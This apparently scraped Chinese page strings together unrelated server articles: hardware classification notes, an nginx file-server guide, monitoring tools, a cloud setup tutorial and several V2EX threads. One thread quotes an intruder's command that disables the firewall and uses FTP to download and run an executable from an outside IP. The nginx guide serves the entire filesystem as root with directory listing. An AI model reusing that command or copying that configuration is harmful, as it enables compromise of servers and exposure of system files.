System X系列服务器型号有四位数字:3xxx后两位是“00”的表示该服务器是塔式机箱,“50”表示,机架式设计,另外有一款特殊的X3610,是X3650的简化版,也是2U机架式的,但是精简掉了很多功能。 前两位大概代表了该服务器的性能指标,其中“31”和“32”是一路服务器,如3100、3250等,这类服务器只能安装一颗CPU。
“34”“35”“36”如3400、3550、3650都是两路服务器,即可以安装2颗CPU,
“38”和“39”是多路服务器,单机支持4路CPU,通过扩展组件可以实现16块CPU的密度,这是业界基于X86构架服务器的*高CPU密度。
另外还有一个不太常见的系列,就是结尾两位是“55”的服务器,如X3755等,这些服务器是基于AMD皓龙CPU的,国内很少出货。 一般31xx~32xx级别的System X都是用作简单的应用,如打印服务器,文件共享服务器等;
34xx~36xx级别的可以用作部门级的应用,如边界应用服务器,小型ERP,CRM,域控服务器等;
38xx和39xx可以算得上PC服务器里的“战斗机”了,性能可以和低端System p比肩,一般用作后端数据库服务器,大规模ERP应用,或者高CPU密度的计算任务等。

小型机
小型机是指采用8-32颗处理器,超过32GB的海量内存容量,性能和价格介于PC服务器和大型主机之间的一种高性能 64 位计算机。国外小型机对应英文名是minicomputer和midrange computer。在服务器市场中小型机处于中高端位置。

在中国,小型机习惯上用来指UNIX服务器,所以可见小型机的操作系统多是Unix系的操作系统。几大厂商都Unix服务器多为自己的特有系统,如,IBM的AIX,HP的HP-UX,SUN的Solaris,这些操作系统面向基于RISC指令集的硬件。并且UNIX操作系统和硬件通常是由同一家制造商开发。

%title插图%num

(上图为IBM P750)

下边这张三国鼎立图说明了,现在小型机市场主要是由IBM,HP,Oracle(Sun)三大公司所把持。其中IBM凭借Power 6、7、8芯片暂居*对优势。%title插图%num

三大公司的主要产品:

1.IBM的POWER系列,采用POWER6和POWER7芯片处理器,运行AIX操作系统。
2.HP的Integrity系列,采用由HP和INTEL联合开发的Itanium(安腾)处理器,运行HP-UX。
3.Oracle-SUN系统,采用SPARC芯片处理器架构,运行Solaris操作系统。

(由于Solaris操作系统被移植到了x86平台上,SUN的定义就有些模糊,其实SUN还是区别于x86和基于RISC指令集的SPARC系统的,是被作为SPARC中的企业级系统。)

特性:

小型机的性能和价格介于PC服务器和大型主机之间的一种高性能 64 位计算机。小型机跟普通的PC服务器是有很大差别的,*重要的一点就是小型机的高RAS(Reliability, Availability, Serviceability 高可靠性、高可用性、高服务性)特性。
RAS是Reliability, Availability, Serviceability三个英文单词的缩写,它们反映了计算机的高可靠性、高可用性、高服务性三个著名特点,它们的具体含义如下:
高可靠性(Reliability):计算机能够持续运转,从来不停机。
高可用性(Availability):重要资源都有备份;能够检测到潜在要发生的问题,并且能够转移其上正在运行的任务到其它资源,以减少停机时间,保持生产的持续运转;具有实时在线维护和延迟性维护功能。
高服务性(Serviceability):能够实时在线诊断,精确定位出根本问题所在,做到准确无误的快速修复。

去小型机化

在以往的印象当中,x86服务器在中低端形成了统治之势,而小型机则在关键性应用领域(金融、证券、政府等)享有王者地位。但是随着X86服务器的不断发展,这两年来“去小型机化”的趋势趋于明显,众多金融、电信、政府等用户正逐渐将更多的应用迁移到x86平台。随着X86服务器在架构、制程工艺、核心数量等方面不断的提升,性能直追小型机,更廉价、更开放、更加标准化、更简单易用的优点也让用户越来越乐于接受。小型机在关键任务中的宝座似乎也不再那么稳固了。

大型机
大型机(Mainframe)的功能、价格以及性能上都在小型机和x86服务器之上,是一种用于大规模计算的计算机系统。大型机通常用于政府、银行、交通、保险公司和大型制造企业。特点是处理数据能力强大、稳定性和安全性又非常高。

大型机的特点是处理数据能力强大、稳定性和安全性又非常高。

目前,市场上主流的大型机有两家:IBM和UNISYS。IBM大型机是其z系列服务器。顺便说下,Sun和HP不生产大型机,但它们生产性能和用途类似于IBM大型机的高端Unix服务器。

现在IBM主推的z系列的大型机是:IBM  zEnterprise大型服务器主机。

%title插图%num

按服务器外形分类
按照服务器的外形结构来分可以分为塔式服务器、机架式服务器和刀片服务器。

%title插图%num

按处理器数量分类
“路”都是指服务器物理CPU的数量,也就是服务器主板上CPU插槽的数量。

单路:指服务器支持1个CPU
双路:指服务器支持2个CPU
四路:指服务器支持4个CPU
多路:指服务器支持多个CPU

双核,就是将两个计算内核集成在一个硅晶元上。从而提高计算能力。多核就是将多个计算内核集成在一个硅晶元上。

双路(英文缩写为SMP)则是采用两颗相同型号并且能够支持SMP技术的CPU组成的一套系统。指在一台计算机上汇集了一组处理器,多个CPU共享计算机内存子系统及总线架构。在这种架构中,同时由多个处理器运行操作系统的单一复本,并共享内存和一台计算机的其他资源,系统将任务队列对称地分布于多个CPU之上,从而*大地提高了整个系统的数据处理能力。所有的处理器都可以平等地访问内存、I/O和外部中断。在对称多处理系统中,系统资源被系统中所有CPU共享,工作负载能够均匀地分配到所有可用处理器之上。我们平时所说的双路CPU系统,实际上是对称多处理系统中*常见的一种形式,常用于主流的X86服务器和图形工作站领域。

*简单的说法,双核=1颗CPU有两个核心,双路=两个对称的CPU(这颗CPU也可以是双核的CPU)。

另外,服务器选择中的CPU配置方式。
小型企业:1~2路处理器
中型企业:2~4路处理器
大型企业:4~8路处理器

%title插图%num

服务器分解图

%title插图%num

nginx搭文件服务器

安装nginx
yum -y install nginx

搭建文件服务器
1.改为root用户
原来的nginx.conf里,*行是

user ngix; # 不同版本的不一样
改为

user root;

2.加一个server
①配置文件位置
[root@VM_0_9_centos ~]# find / -name nginx.conf
/var/opt/gitlab/nginx/conf/nginx.conf
/opt/gitlab/embedded/lib/ruby/gems/2.4.0/gems/unicorn-5.1.0/examples/nginx.conf
/opt/gitlab/embedded/conf/nginx.conf
/etc/nginx/nginx.conf # 这个是要找的文件

②html目录
/usr/share/nginx/html # 默认的
1
③在原来的nginx.conf里加一个server配置
配置写在http { } 里面,与其他server 同级别。

autoindex on;# 显示目录
autoindex_exact_size on;# 显示文件大小
autoindex_localtime on;# 显示文件时间

server {
listen 8080 default_server;
listen [::]:8080 default_server;
server_name _;
#root /usr/share/nginx/html;
root /data/;

location / {
}

error_page 404 /404.html;
location = /40x.html {
}

error_page 500 502 503 504 /50x.html;
location = /50x.html {
}
}

参考:https://www.jianshu.com/p/95602720e7c8

3.启动
service nginx start
service nginx stop
service nginx restart # 重启
nginx -s reload # 修改配置后重启,或者使用reload重载配置文件

4.访问界面
%title插图%num

5.完整的nginx配置参考

user root;
worker_processes auto;
error_log /var/log/nginx/error.log;
pid /run/nginx.pid;

# Load dynamic modules. See /usr/share/nginx/README.dynamic.
include /usr/share/nginx/modules/*.conf;

events {
worker_connections 1024;
}

http {
log_format main ‘$remote_addr – $remote_user [$time_local] “$request” ‘
‘$status $body_bytes_sent “$http_referer” ‘
‘”$http_user_agent” “$http_x_forwarded_for”‘;

access_log /var/log/nginx/access.log main;

sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;

include /etc/nginx/mime.types;
default_type application/octet-stream;

# Load modular configuration files from the /etc/nginx/conf.d directory.
# See http://nginx.org/en/docs/ngx_core_module.html#include
# for more information.
include /etc/nginx/conf.d/*.conf;

server {
listen 80 default_server;
listen [::]:80 default_server;
server_name _;
root /usr/share/nginx/html;

# Load configuration files for the default server block.
include /etc/nginx/default.d/*.conf;
include /etc/nginx/conf.d/*.conf;

location / {
}

error_page 404 /404.html;
location = /40x.html {
}

error_page 500 502 503 504 /50x.html;
location = /50x.html {
}
}

autoindex on;# 显示目录
autoindex_exact_size on;# 显示文件大小
autoindex_localtime on;# 显示文件时间

server {
listen 6868 default_server;
listen [::]:6868 default_server;
server_name _;
#root /usr/share/nginx/html;
root /;

location / {
}

error_page 404 /404.html;
location = /40x.html {
}

error_page 500 502 503 504 /50x.html;
location = /50x.html {
}
}

}

怎么判断服务器数据是否被盗?Windows 文件访问时间没作用?

假设某台 Windows Server 2008R2 / 2012R2 被入侵了,

各位会使用什么方法判断某些文件是否被下载或读取过(比如 abc.txt 文件)?

Windows 的文件访问时间 感觉似乎不是我们通常理解的那样,

也即:只读访问后 它的时间属性不会有任何变化。

所以似乎无法通过文件访问时间 判断 abc.txt 这个文件是否被人访问或下载过?

还有其它可行的方法来判断吗?

wkl17 1
wkl17 2019-02-27 06:21:42 +08:00

为何 V2EX 发 imgur 的图片,有时可以自动解析,有时却不行?
delectate 2
delectate 2019-02-27 06:31:43 +08:00
没用的,看这个毫无意义;一般是看日志,不过日志会被删除。要么恢复日志进行分析,要么文件加密让他下回去没意义(事后诸葛亮),别无他法。
wkl17 3
wkl17 2019-02-27 06:32:24 +08:00
或者更直接一点说吧。有一台作为远程桌面用的 Windows,没跑什么服务。

但我今天发现 cmd 命令行有些异常命令(因为执行某个不存在的 exe 卡住了,所以我通过 procexp 查看到这个异常命令)。

刚搜了一下,命令就像这个 2011 年的百度知道问题:

https://zhidao.baidu.com/question/263547971.html

有个 cmd 尝试执行 ftp 命令行下载某个 exe 程序 并执行。但好在我服务器安装了普通的 HIPS,

根据 HIPS 软件的日志,已成功阻止了它下载。虽然也没什么重要数据,但我好奇的是,

这个入侵者能执行类似这样的命令:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 117.41.184.58> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe

那服务器上的某个文件(比如刚才举例的 abc.txt )如果被入侵者下载或读取过,是否有办法判断出来?
wkl17 4
wkl17 2019-02-27 06:43:40 +08:00
@delectate 请再看看我上楼补充的内容。我粗看了 Windows 系统日志,应用程序、安全、系统 这 3 项日志没有发现什么明显异常的日志信息。而且文件读取记录肯定也不会记录在 Windows 系统日志的。服务器也没有跑 Web,所以 i 也没有 Web 日志。

我遇到的情况跟百度知道那个问题很像,也是先尝试 net1 stop sharedaccess (不过被 HIPS 阻止了)。
各位认为对方执行这样的命令,可能是通过什么漏洞来实现的?

服务器是 2K12 R2,除了 R2 的近 900MB 的补丁和 xx 月恶意软件删除工具 没打,其它的补丁很久以前都打过了。

因为也没跑 web,所以打了补丁后 也没做更多的优化,只是使用 HIPS 类软件控制联网(需手工放行)

但我刚才 netstat,发现 137、138、445 的端口还是处于监听状态。不过我也测试了从外网 telnet,

确认这几个端口无法从外网通讯。(应该是被防火墙挡下了)。
yw9381 5
yw9381 2019-02-27 08:54:10 +08:00 via Android ❤️ 1
基本判断。服务器已经是被入侵了。对方应该是用脚本批量化抓肉鸡之类的操作。个人猜测它对你服务器上应该什么都没动。而且下载这个 exe 的过程也被 HIPS 拦截了。
建议对服务器整体的安全做一个检查。去看看对外开放的端口(netstat -ano|findstr 0.0.0.0)。如果有用到 MSSQL 版本<=2005 请将 MSSQL 服务降权运行。打上*新的补丁(Windows Update 就可以)
具体环境还是要因机器而异。如果方便的话我还是希望能够看看定位一下具体问题然后再做处理
有其他的安全上的问题可以继续讨论
mmdsun 6
mmdsun 2019-02-27 12:37:52 +08:00 via Android
系统打了补丁黑进去可能性*低。应该是安装的软件有漏洞,比如 Redis,IIS 之类的。建议用标准账户。管理员账户上锁。
QQ2171775959 7
QQ2171775959 2019-02-27 13:53:15 +08:00
看一下服务器的日志吧。
CallMeReznov 8
CallMeReznov 2019-02-27 13:57:05 +08:00
3389 端口也得改,我前几天就因为这个中招了 7-8 台机器都挂了
visonme 9
visonme 2019-02-27 14:03:18 +08:00
你说的这些都是在应用层可以被清空修改的东西,就算有保留,你看到的也不一定就是真实的数据。

怎么看不清楚,或许需要交给专业的安全人士
如果从开发角度来说,有两种方式可以达到监控,一个是 hook 相关的操作 API,然后记录,另一种通过文件监控驱动实
wkl17 10
wkl17 2019-02-27 20:52:09 +08:00
@yw9381
@mmdsun
@QQ2171775959
@CallMeReznov
@visonme
没有跑 Web 服务,MySQL 当时也没运行,而且我通过 HIPS 工具阻止了从公网访问 3306。默认的 3389 也早就改掉了。
或者,假如想分析对方究竟是利用什么漏洞来入侵的,各位可有分析的方法或工具分享一下?谢谢。

yw9381 11
yw9381 2019-02-28 00:17:38 +08:00 via Android
@wkl17 这个就得具体看服务器上跑了什么业务。需要做一些可能牵扯取证及攻击朔源的工作。做攻击行为分析。如果可能的话。我还是比较希望能够以远程的形式接入服务器看看到底对方是怎么搞的。找出问题根本在哪
wkl17 12
wkl17 2019-02-28 01:08:41 +08:00
@yw9381 感谢!感觉入口应该还是 Windows 的组件。我暂时先将一些服务关闭了,再观察看看。
WinRM、MSMQ、lmhosts(NetBIOS)、ScDeviceEnum(SmartCard 相关服务)
我很早以前也安装了实时流量统计工具,但是它的功能比较简单,虽然可以查看所有历史流量。
*大多数流量是 svchost.exe 产生的,但是我使用 rdp 连接,流量应该也被包含在内。所以无法单独统计 rdp 究竟占用了多少流量。否则应该就能逆向分析我这个问题了。

各位如果哪位知道有什么办法 可以精确统计 Windows 各组件通过 svchost.exe 进程产生的流量,请分享一下方法。
yw9381 13
yw9381 2019-03-01 02:31:10 +08:00 via Android
我觉得根本问题还是要先排查可能的途径。单纯流量意义不大。而且对方用你机器做什么你也不知道。更别说一些 rootkit 技术或是混淆伪装之类你根本看不出来的方法
opengps 14
opengps 2019-03-23 08:05:55 +08:00 via Android
本机写个监控,记录日志。。。

戴尔 PowerEdge 2900 服务器上的志强 E5405 CPU 有没有办法调整一下频率

请教各位大侠,这个 E5405 默认频率是 2G,结果肯定是外频的晶振频率偏低,造成了这个 CPU 的实际运行频率只有 1995.020MHz,但是某个程序要求必须 2G 以上的运行频率,检查到低于 2000M 就被 Pass 了,所以想请教一下各位老大有没有这个服务器 CPU 的超频方法。

BIOS 里应该是没有类似的普通 PC 的调整外频的超频设置,我又不可能硬改(某些贴吧里有修改某某电阻的阻值来提高*终作用在 CPU 上的外频),有没有软的方法,哪怕运行一下欺骗一下这个程序的检测也行。

CPU 有两颗,一共 8 核 8 线程。

方案:
1、修改 BIOS 设置;
2、服务器装的是 ESXi,有没有软件方式修改;
3、虚拟机跑的是 CentOS7,有没有类似软件修改的方法;
4、……

不知道还有什么思路,哪怕就提高 5M 到达 2000MHz 就好了,谢谢。

sun1991 1
sun1991 2019-02-15 12:21:40 +08:00
放虚拟机里跑?
ShunYea 2
ShunYea 2019-02-15 12:40:03 +08:00 via Android
@sun1991 这个服务器运行了 ESXi,里面的虚拟机是 centos7,就是说能不能从某个层面上把频率超上去 5m
dazhangpan 3
dazhangpan 2019-02-15 12:41:07 +08:00 via Android
开 turbo?
trepwq 4
trepwq 2019-02-15 12:46:37 +08:00 via iPhone
感觉改改 esxi 虚拟机配置应该可以
ShunYea 5
ShunYea 2019-02-15 14:34:49 +08:00
@dazhangpan
请教怎么个操作法?这个 CPU 没有睿频。
ShunYea 6
ShunYea 2019-02-15 14:35:16 +08:00
@trepwq
好像有点高深,找不到类似的教程唉。
ccav 7
ccav 2019-02-15 15:31:18 +08:00 via iPhone
花几十块换 cpu 5400 系列现在 钥匙扣价。
ShunYea 8
ShunYea 2019-02-15 18:05:47 +08:00
@ccav 主要是服务器拆机没有普通 PC 方便啊,好多的卡扣,太麻烦了。
chinvo 9
chinvo 2019-02-15 18:08:36 +08:00 via iPhone
@ShunYea #8 我怎么感觉服务器更好拆呢
sdijeenx 10
sdijeenx 2019-02-15 18:10:50 +08:00
自己买 CPU 偷偷换成 E5420,等换人维护的时候再偷偷把原 CPU 装回去~

ShunYea 11
ShunYea 2019-02-15 18:12:04 +08:00
@chinvo
@sdijeenx
好吧,两位老铁的建议,我去淘 2 个 CPU 吧。
chinvo 12
chinvo 2019-02-15 18:12:30 +08:00 via iPhone
另外很好奇,什么样的应用才会这么严格地检查 CPU 主频,一般不是写在用户手册上么
ShunYea 13
ShunYea 2019-02-15 21:41:20 +08:00 via Android
@chinvo 做了个服务出租的功能,但是对方软件相当于对性能有要求,然后对方的脚本就是这样判断的,低于 2000m 就 pass,我也觉得可以有个范围,这样界定太不合理。
julyclyde 14
julyclyde 2019-02-17 21:30:53 +08:00
既然晶振低,那程序咋知道自己运行在 1995 的?
QQ2171775959 15
QQ2171775959 2019-02-20 16:09:23 +08:00
超一下频吧。
ShunYea 16
ShunYea 2019-02-21 17:14:47 +08:00 via Android
@julyclyde 程序自己检测 CPU 不是难事吧,检测低于 2000m 就不通过,这个逻辑很好理解嘛
ShunYea 17
ShunYea 2019-02-21 17:15:16 +08:00 via Android
@QQ2171775959 现在就是想咨询超频的方法

做运维,送你7个常用的服务器资源监控工具

摘要:服务器监控工具功能相当强大,无论何时何地,我们都可以了解到服务器的功能以及性能。服务器监控工具的使用,可以让我们清楚的知道用户可以打开我们的网站,且确保网速不慢。这里为你列出了几个常用的服务器监控工具,为你省去寻找方案的麻烦。
以这台鲲鹏服务器为例,先查看自己操作系统的发行版本

%title插图%num

(1)nmon:支持收集一段时间内,整机的CPU、磁盘、网络、内存等各项资源的使用情况。

%title插图%num

(2)perf:Linux kernel自带的系统性能优化工具,获取指定进程内的调用情况、各线程调用的CPU资源消耗情况,并支持生成火焰图。

%title插图%num

火焰图的生成过程是:

先trace系统,获取系统的profiling数据
用脚本来绘制
#脚本获取
git clone https://github.com/brendangregg/FlameGraph
(3)top:监控进程和整机的CPU、内存资源消耗情况,并支持查看每个CPU核的使用情况。

1.负载:时间,登陆用户数,系统平均负载;

2.cpu:用户态,核心态,NICE,空闲,等待IO,中断等;

3.进程:运行,睡眠,停止,僵尸;

4.内存:总量,已用,空闲(系统角度),缓冲,缓存;

5.交换分区:总量,已用,空闲

任务区域默认显示:进程ID,有效用户,进程优先级,NICE值,进程使用的虚拟内存,物理内存和共享内存,进程状态,CPU占用率,内存占用率,累计CPU时间,进程命令行信息。%title插图%num

(4)iostat:监控每块磁盘的读写次数、数据量大小、使用率。

iostat属于sysstat软件包,可以直接安装。

 yum -y install sysstat
%title插图%num

(5)sar:(System Activity Reporter系统活动情况报告)目前LINUX上*为全面的系统性能分析工具之一,监控每张网卡的网络IO读写次数和数据量大小。

先安装deltarpm再安装sar工具(sar也属于sysstat软件包,可以直接安装。)

yum install deltarpm
yum install sysstat

(6)dstat:监控系统整体的性能信息,包括CPU、磁盘、网络、分页等。输出是彩色的,可读性较强

安装dstat

yum install dstat-0.7.2-12.el7 -y

%title插图%num

(7)htop:htop 是Linux系统中的一个互动的进程查看器,可以让用户交互式操作,支持颜色主题,可横向或纵向滚动浏览进程列表,并支持鼠标操作。

安装htop

yum install -y htop

%title插图%num

htop优点:

▪ 在启动上,比top更快。

▪ 可以横向或者纵向滚动浏览进程列表,以便看到所有的进程和完整的命令行。

▪ 杀进程时不需要输入进程号。

▪ htop支持鼠标操作。

手把手教你搭建腾讯云服务器(图文并茂)

背景
暑假期间,愁着无聊但也不能荒废学业吧,毕竟以后想靠技术混口饭吃!为了实施自己的计划,特地挑了一个便宜的云服务器来用作自己的后台;这不是学生狗没钱嘛,所以我就挑了一个腾讯云服务器。虽说配置很低,但够我们玩就行。因为想写一个电商App,数据总不能从本地数据库来吧,那样也太没水平了!因为自己也会一点Java Web 服务器,索性租了一个云服务器,接口啥的自己写,说干就干吧。

由于本人是在校学生,所以从腾讯那买了一个学生版的服务器。性价比确实很高,价位是10元/月。

注意:我选择的是Windows Server,所以这篇文章是基于Windows平台搭建的。本人对于其他平台不是很了解,虽然接触过Linux,但是并不太会玩,所以搭建也变得更费劲了。索性我们就选熟悉的操作系统吧!(附上我的服务器配置图,这配置你懂的。)这里小小提示一下:我们的服务器是可以改变操作系统的。如果你现在是linux想改成window也是可以的,它会帮你重新安装新的系统,这也意味着数据都清空了。
%title插图%num

背景介绍完毕,一个苦逼的android开发者居然还要自己开发服务器,说多的都是泪!那就不多bb了,我们开始搭建环境。

服务器搭建
1、首先,我假设你已经买了腾讯云服务器了(官网购买),如上图中可以看到我们买的服务器在运行中。

2、win + r 组合键,输入:mstsc

计算机:填写你的服务器ip(公网ip)

用户名:Administrator(默认),密码会发到你的邮箱上。

%title插图%num

打开显示选项,可以看到 本地资源 —> 点开详细信息,勾选驱动器(这个作用是让你可以从PC拷贝 jdk、tomcat等到你的服务器盘中,放C盘下就可以。)

%title插图%num

至此*步基本操作完成,我们登录我们刚才配置的服务器体验一下吧。没错,下面这个图就是我们的服务器桌面了。因为是刚初始化的,桌面空空如也!

%title插图%num

之前没接触过服务器的你会惊讶的发现:what?这不是和Win10系统貌似差不多吗,只是它精简了很多软件驱动等,系统变得很小!

环境搭建
安装JDK+Tomcat+MySQL驱动
1、JDK环境配置,这里可以直接复制我的,然后改一下你们自己的路径,就OK了(PS.注意看清楚 .;)

系统变量→新建 JAVA_HOME 变量 = 变量值填写jdk的安装目录 ;JAVA_HOME = E:\Java\jdk1.7.0
系统变量→新建 CLASSPATH 变量 =  .;%JAVA_HOME%\lib;%JAVA_HOME%\lib\tools.jar
Administrator修改path变量,在*后增加  ;%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin;

2、Tomcat环境配置:

系统变量→新建TOMCAT_HOME 变量=变量值填写tomcat安装目录;TOMCAT_HOME = E:\Java\tomcat7
系统变量→新建 CATALINA_HOME变量=变量值填写tomcat安装目录; CATALINA_HOME = E:\Java\tomcat7
Administrator修改path变量,在*后增加  ;%CATALINA_HOME%\bin;%CATALINA_HOME%\lib

· 测试Tomcat服务器是否安装成功:

先启动Tomcat(cmd命令:startup),在浏览器输入  http://localhost:8080/ ,会出现一个tomcat页面,那么说明成功了。

3、MySQL驱动安装,特别提醒,如果出现以下的问题:把mysql安装包拷贝到服务器C盘里面,再进行安装就不会出错。

%title插图%num

  检查是否可用:net start mysql

%title插图%num

至此,云服务器和环境基本搭建完成!

域名绑定
*后,绑定我们域名。(域名自行购买,可根据自己需要决定,这个需要身份证认证。)

%title插图%num

点击图上 解析 ,出现以下界面,点击添加纪录,红色框框里面填写自己的公网IP即可。

%title插图%num

到此结束,你的域名绑定成功了。怎么用呢?

例如:  http://192.168.1.1:8080/

改为:  http://[abc520.com]:8080/          [里面是你的域名]

全部教程结束。这是我的*篇文章,因为我是理工科的难免语言组织得不够好,所以写的不是很好。我们只能关注技术。

频繁修改的静态文件如何较好地部署到服务器上?

本人搞前端的,将静态文件(修改较频繁)在部署到服务器上时,遇到了如下两难的问题:

  1. 打包的文件始终使用静态文件名,如index.jstest.xml时,浏览器必须要强制刷新才能更新缓存,在移动端如微信 QQ 更是麻烦;
  2. 使用基于内容的 hash 文件名,如index.fd1s20.js时,不好清理服务器中废弃的文件。

请大佬指点

creamiced 1
creamiced 2019-03-07 19:29:19 +08:00
抛砖,HTTP 响应设置不缓存
akira 2
akira 2019-03-07 19:34:17 +08:00
加版本号参数
xiaoming1992 3
xiaoming1992 2019-03-07 19:37:04 +08:00
@creamiced 感谢回复,但是毕竟是前端页面,不可能不缓存的啊。主要是客户经常修改,我上传上去后,客户经常反馈手机上看着没反应(需要更新缓存),但流量消耗较大,稳定阶段不应该频繁更新缓存,这样就矛盾了。还有,不清楚问题复杂度怎么样,所以不方便请后端配合。
izoabr 4
izoabr 2019-03-07 19:38:10 +08:00
应用的时候尾巴加个随机字符参数试试
比如 src=”/js/index.js?random=19322873283939″
xiaoming1992 5
xiaoming1992 2019-03-07 19:38:31 +08:00
@akira 今天刚测试的,在 QQ 上,就算更新了版本号,QQ 依然不会更新缓存,微信上没测试。
xiaoming1992 6
xiaoming1992 2019-03-07 19:39:05 +08:00
@izoabr 今天刚测试的,在 QQ 上,就算更新了版本号,QQ 依然不会更新缓存,微信上没测试。
xiaoming1992 7
xiaoming1992 2019-03-07 19:40:56 +08:00
而且,有修改的文件需要更新缓存,没有修改的文件不需要更新,如果手动修改 url 的话也是个麻烦事,可能错漏。
pelloz 8
pelloz 2019-03-07 19:44:08 +08:00
使用方案 2,然后写一个脚本定时清理,发现文件名相同,hash 后缀不同的文件,移除修改时间比较旧的。
xiaoming1992 9
xiaoming1992 2019-03-07 19:51:04 +08:00
@pelloz 貌似是一个好办法,试试?
mostkia 10
mostkia 2019-03-23 15:04:46 +08:00
检查名字+修改时间较旧的移除+1

如何在 4 层协议的基础上实现域名转发

有一个特殊的需求:需要在 4 层协议上实现域名转发
正常情况下域名在 http 层,

这个能实现吗?各位有没有好的方案
目前尝试过 nginx 和 haproxy 都实现不了

第 1 条附言 · 2019-02-15 11:02:35 +08:00
表达能力太弱。。。。
原始需求:实现一个支持域名分发、负载均衡的 4 层高性能代理服务器,
关键点在:要支持在第四层,也就是传输层 解析出请求要访问的域名,然后根据这个域名将请求转发出去
第 2 条附言 · 2019-02-15 11:37:36 +08:00
先谢谢大家
了解到不存在“支持在第四层解析出域名”的情况,现在把需求改为:
实现一个支持域名分发、负载均衡的高性能代理服务器,
因为开启 TLS 双向验证,如何在握手失败前解析出 Host,然后根据 Host 进行分发
有一位朋友建议使用 sni

momocraft 2019-02-15 10:27:00 +08:00
什么叫 4 层协议和域名转发…
xenme 2
xenme 2019-02-15 10:32:07 +08:00
同没看懂,感觉像是反代
iAcn 3
iAcn 2019-02-15 10:37:12 +08:00 via Android
四层 => 传输层?
域名转发 => 代理?
CMGS 4
CMGS 2019-02-15 10:40:59 +08:00
就是 tcp 层面转发吧。。
gam2046 5
gam2046 2019-02-15 10:43:13 +08:00
http 层???

OSI 模型并没有所谓的 HTTP 层,HTTP 协议是属于第七层;
而第四层是属于 TCP/UDP 协议这样的;
同样的是,DNS 也属于七层;

所以并不懂你说的什么意思。
Y4ssss 6
Y4ssss 2019-02-15 10:44:32 +08:00
@iAcn @CMGS 是的
Y4ssss 7
Y4ssss 2019-02-15 10:51:52 +08:00
@gam2046 实现一个支持域名分发、负载均衡的 4 层高性能代理服务器,要支持在第四层解析出域名
Y4ssss 8
Y4ssss 2019-02-15 10:53:07 +08:00
原始需求:实现一个支持域名分发、负载均衡的 4 层高性能代理服务器,
关键点在:要支持在第四层,也就是传输层解析出域名
oott123 9
oott123 2019-02-15 11:04:04 +08:00
要解析出域名,你就变成 7 层了,当然你可以解析出来之后原样把 tcp 包发过去……
lychnis 10
lychnis 2019-02-15 11:06:05 +08:00 via Android
大厂一般都有这些东西
没有就自己写一个

Y4ssss 2019-02-15 11:10:08 +08:00
@oott123 开启了双向 TLS 验证,没有客户端密钥时,怎么解析
Y4ssss 13
Y4ssss 2019-02-15 11:10:36 +08:00
@lychnis 能提供下思路吗
oott123 14
oott123 2019-02-15 11:13:42 +08:00
@Y4ssss sni 试试? tls 不太熟,不确定 sni 加密了没,握手的时候如果没有 esni 应该是没加密的
lychnis 15
lychnis 2019-02-15 11:17:23 +08:00 via Android
负载均衡应该做过吧 ? nginx 之类能不能实现我不了解,网上查查
你要是一点背景知识都不会的话,,,这论坛上不可能说的清楚的
xihefeng 16
xihefeng 2019-02-15 11:17:24 +08:00 via Android
没有用的,你了解下 tcp 协议就知道,不可能,在第四层的时候,只有 ip 和端口的,没有域名的概念
gam2046 17
gam2046 2019-02-15 11:18:41 +08:00
四层没有域名啊。

域名这个东西是七层搞出来的。同样,DNS 是工作的七层,目的是将七层自定义的“域名”与三层的 IP 做一个映射关系。

所以不存在“支持在第四层解析出域名”的情况。

而 IP 协议是工作在三层的,我们常说的 TCP/IP 是协议簇,而不是一个协议。TCP 与 IP 是分开的。

当信息流进入四层的 TCP 后,已经只存在 IP 信息了。

你这不是一个伪需求,而是一个不存在的需求。

不过四层是可以做负载均衡的。

所以,如果如是我理解错你的意思的话,那就是你对这些概念理解有一点偏差。
Y4ssss 18
Y4ssss 2019-02-15 11:24:51 +08:00
@xihefeng
@gam2046 了解了,谢谢 2 位解惑
AstroProfundis 19
AstroProfundis 2019-02-15 11:28:39 +08:00
需求描述有点奇怪,楼上已经说了,在四层是不存在域名的概念的,解析出域名就变成一个七层的事情了

但我猜你需要的是类似 LVS 的东西?
Y4ssss 20
Y4ssss 2019-02-15 11:40:12 +08:00
@AstroProfundis 难点主要在开启 TLS 时如何解析出 host,根据 host 进行分发,我了解的 LVS 主要是负载均衡功能
rockyou12 21
rockyou12 2019-02-15 12:26:06 +08:00
@Y4ssss 确实没读懂 lz 的需求,但 nginx 的反代是支持单机、对多个开启 tls 的域名分别进行反代的,我司生产也是这么用的
Y4ssss 22
Y4ssss 2019-02-15 14:00:44 +08:00
@rockyou12 可以贴下 nginx 的 tls 域名反代 配置信息吗
Y4ssss 23
Y4ssss 2019-02-15 14:04:10 +08:00
@Y4ssss 这边有一点不同,代理服务器上没有证书,TLS 握手不能成功,所以正常情况下取不到域名,所以才有上述需求
lty1993 24
lty1993 2019-02-15 14:20:36 +08:00
我能想到的只有 SNI 了。如果客户端不支持 SNI 就没办法了。
lty1993 25
lty1993 2019-02-15 14:21:03 +08:00
如果只是要根据 SNI 进行转发,我记得 HAProxy 应该是可以的。
Y4ssss 26
Y4ssss 2019-02-15 14:30:43 +08:00
@lty1993 谢谢,我去试试
reus 27
reus 2019-02-15 14:52:49 +08:00
不就是中间人攻击嘛
如果可以实现,那还要 tls 之类的干嘛?
定期做 dns 查询,根据域名对应的 ip 做转发即可
当然也只是转发,想解析是不可能的
coderscala 28
coderscala 2019-02-15 15:15:23 +08:00
DNS 负载均衡
rockyou12 29
rockyou12 2019-02-15 22:33:54 +08:00
@Y4ssss 没证书别想了……就像 27 楼说的,你这是做中间人攻击

